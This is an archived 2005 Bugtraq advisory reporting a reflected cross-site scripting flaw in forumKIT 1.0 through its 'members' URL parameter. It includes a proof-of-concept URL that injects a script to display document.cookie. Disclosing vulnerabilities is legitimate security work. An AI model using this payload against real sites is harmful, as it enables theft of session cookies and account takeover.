[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS Vulnerability in ForumKIT

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS Vulnerability in ForumKIT
From: tom cruise <the.n3t@xxxxxxxxx>
Date: 13 Jan 2005 11:17:00 -0000


Vulnerable System :
forumKIT 1.0

Description : 
an XSS is founded in the variable members that have the value 'true'
you can exchange it with XSS Code .

exploit : 
http://forum.target.com/f.aspx?members=";>&lt;script&gt;alert(document.cookie);&lt;/script&gt;

this exploit is discovered by : neO
e-mail : al_modamer@xxxxxxxxxxx

Prev by Date: [CLA-2005:916] Conectiva Security Announcement - ethereal
Next by Date: [CLA-2005:917] Conectiva Security Announcement - krb5
Previous by thread: [CLA-2005:916] Conectiva Security Announcement - ethereal
Next by thread: [CLA-2005:917] Conectiva Security Announcement - krb5
Index(es):
- Date
- Thread